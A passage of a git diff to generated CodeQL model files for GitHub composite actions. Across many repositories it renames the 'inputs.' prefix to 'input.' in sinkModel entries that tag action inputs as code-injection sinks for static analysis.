b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 97c75ae6f5c..5414a755179 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index fa98e84315d..97a3bfa026e 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 3bc48b644d0..81672e85557 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] - - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index 81e07943026..b4fdfaf273d 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] - - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index a1fdb476748..6f1043073d8 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 5744f3e7495..f9244c44858 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 852e39799d9..36332c5678d 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index a0d7eb51354..c246e5de06f 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 8d10d22cd5c..13c0093fe4a 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index c99c630853e..49b226de1e8 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8554ebec65f..9a6e0b88ba2 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 6f0878a77cb..4f88855a561 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] - - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 198109f790c..5683d28567f 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index e634eaa38a2..424c7241bcf 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index e26ba9755d0..37295f2cf6c 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 2cda1936f01..e7c767d2dce 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index f83cf533944..7f78690f639 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index 5af04ac6ac7..ba1beace170 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 0d0cae87e09..d6ee6c8bb7d 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 070b502e188..83951f43c63 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] - - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 6c0cf90523a..397ab083809 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index ca6459221d4..5dd069df499 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 79d14b65bcc..1a1d763d6e4 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 69771693787..a8e95d30457 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index a5a3cfbb1c9..52d085ee479 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] - - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 2000f5d9d00..33c56a67cb9 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] - - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 95164c659ed..258101eecea 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 7e3b5e4caf6..d77e05c680b 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index f335170dc85..db98f8d769a 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 555fa42a79c..7607840dbdc 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 8fd9440729f..2fa4f8dfa61 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index f9479e11aab..80725157e33 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 711eabc2bfa..9d317f14272 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ 